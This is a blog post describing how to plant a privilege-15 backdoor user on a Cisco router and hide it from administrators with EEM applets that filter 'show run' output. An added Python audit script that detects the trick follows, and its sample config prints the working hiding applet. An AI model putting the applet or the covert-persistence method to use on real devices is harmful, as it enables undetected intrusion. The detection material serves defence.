And Yet Another Weekend Post! (YAWP)
Do you know how to create hidden users on the Cisco CLI?! If not, then this article is for you... Enjoy!
Let's assume you have got an elevated command prompt on a Cisco router and you want to establish a permanent backdoor on the device while leaving as few markers as possible. You need to do this with code that already exists on the box, and the key point is to change the configuration as little as possible.
Cisco EEM is the answer.
Cisco EEM is like a programming language built into any modern Cisco IOS router or switch. It allows all sorts of automatic actions to take place, and it has one key feature we'll exploit here: it can 'catch' a command string a user enters and transparently replace it with another string, one that filters our 'malicious' pivot code out of the output.
1. Create a user with level 15 permission:
Hint: note that the username contains the string "hidden" again; lines containing that string are the ones we are hiding from the configuration output.
2. Install a couple of EEM functions:
These hide our user and command history from legitimate admins by intercepting their commands and substituting filtered versions that strip out our information.
There you go! You just DID it!
I know, you tried to copy and paste the code, but it did not work. I put that in PNG format so that you have to write it manually for exercise purposes! 😈
Caveats of using this method are:
If the management tool uses SNMP to pull the full config, the pull bypasses the EEM hook: the new config gets overwritten and the users become visible! If the tool is like most tools and simply uses a service account to programmatically run "show run", your config will stay hidden.
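From the defender's side, the two weaknesses just described (the applet only filters the interactive CLI view, and a line filter on the applet's own header leaves orphaned event/action lines behind) are exactly what a config audit should key on. The following script is an added example, not code from the original post: it parses a running-config text, flags EEM applets that intercept a "show" command with sync yes skip yes or re-run a command through an output filter, reports indented EEM body lines with no enclosing applet header, lists privilege-15 users, and diffs an out-of-band copy of the config against what the interactive CLI returned. Hostnames, usernames, secrets and the applet name in the embedded sample are constructed placeholders.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a full running-config as obtained out-of-band
# (a copy of the config file rather than an interactive "show run").
# Hostname, usernames, secrets and the applet name are placeholders.
OOB_CONFIG = """\
hostname edge-rtr
username admin privilege 15 secret 5 $1$ADMIN_PLACEHOLDER
username hiddenuser privilege 15 secret 5 $1$HIDDEN_PLACEHOLDER
!
event manager applet hiddenapplet
 event cli pattern "show run.*" sync yes skip yes
 action 1.0 cli command "enable"
 action 2.0 cli command "show running-config | exclude hidden"
!
end
"""

# Constructed sample of what an interactive "show run" returns when the
# applet above filters out every line containing "hidden".
CLI_VIEW = "\n".join(l for l in OOB_CONFIG.splitlines() if "hidden" not in l) + "\n"

SHOW_HOOK = re.compile(r'event cli pattern\s+"([^"]*)"(.*)')
OUTPUT_FILTER = re.compile(r"\|\s*(exclude|include|section|begin)\b", re.I)
APPLET_HEADER = re.compile(r"event manager applet (\S+)")
APPLET_BODY = re.compile(r"\s+(event|action)\b")


@dataclass
class Applet:
    name: str
    lines: list = field(default_factory=list)


def parse_applets(config):
    """Return (applets, orphans).

    Orphans are indented EEM event/action lines with no enclosing
    'event manager applet' header. A line filter that strips the header
    (because its name matches the filtered string) leaves exactly that
    residue behind, so orphans are a strong tamper signal on their own.
    """
    applets, orphans, current = [], [], None
    for raw in config.splitlines():
        line = raw.rstrip()
        m = APPLET_HEADER.match(line)
        if m:
            current = Applet(m.group(1))
            applets.append(current)
            continue
        if APPLET_BODY.match(line):
            (orphans if current is None else current.lines).append(line.strip())
            continue
        if not line.startswith(" "):
            current = None  # any other top-level line ends the applet block
    return applets, orphans


def suspicious_applets(applets):
    """Flag applets that intercept a 'show' command in place of the real
    one (sync yes skip yes) or re-run a command through an output filter."""
    findings = []
    for a in applets:
        reasons = []
        for line in a.lines:
            m = SHOW_HOOK.search(line)
            if m and "show" in m.group(1).lower() and "skip yes" in m.group(2):
                reasons.append(f'intercepts "{m.group(1)}" and suppresses the real command')
            if line.startswith("action") and "cli command" in line and OUTPUT_FILTER.search(line):
                reasons.append(f"re-runs a command through an output filter: {line}")
        if reasons:
            findings.append((a.name, reasons))
    return findings


def privileged_users(config):
    """Usernames configured with privilege 15."""
    return re.findall(r"^username (\S+) privilege 15\b", config, re.M)


def config_delta(oob_config, cli_output):
    """Non-empty lines present in the out-of-band copy but absent from the
    interactive CLI view; anything here was filtered on the way to the admin."""
    seen = {l.strip() for l in cli_output.splitlines()}
    return [l.strip() for l in oob_config.splitlines() if l.strip() and l.strip() not in seen]


if __name__ == "__main__":
    applets, orphans = parse_applets(CLI_VIEW)
    print("orphaned EEM lines in CLI view:", orphans)
    print("suspicious applets in out-of-band copy:", suspicious_applets(parse_applets(OOB_CONFIG)[0]))
    print("privilege-15 users, CLI vs out-of-band:", privileged_users(CLI_VIEW), privileged_users(OOB_CONFIG))
    print("lines hidden from the CLI view:", config_delta(OOB_CONFIG, CLI_VIEW))
```

In practice the out-of-band copy is whatever your backup or compliance tooling already collects without going through the interactive CLI; the delta between that copy and a "show run" captured over SSH is the check that defeats this technique, and the orphan check catches the residue even when only the CLI view is available.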
If you want to know more about EEM, then continue reading:
Event detectors and actions
EEM uses event detectors and actions to provide notifications of those events.
IOS Embedded Event Manager supports more than 20 event detectors that are highly integrated with different Cisco IOS Software components to trigger actions in response to network events. Some examples are: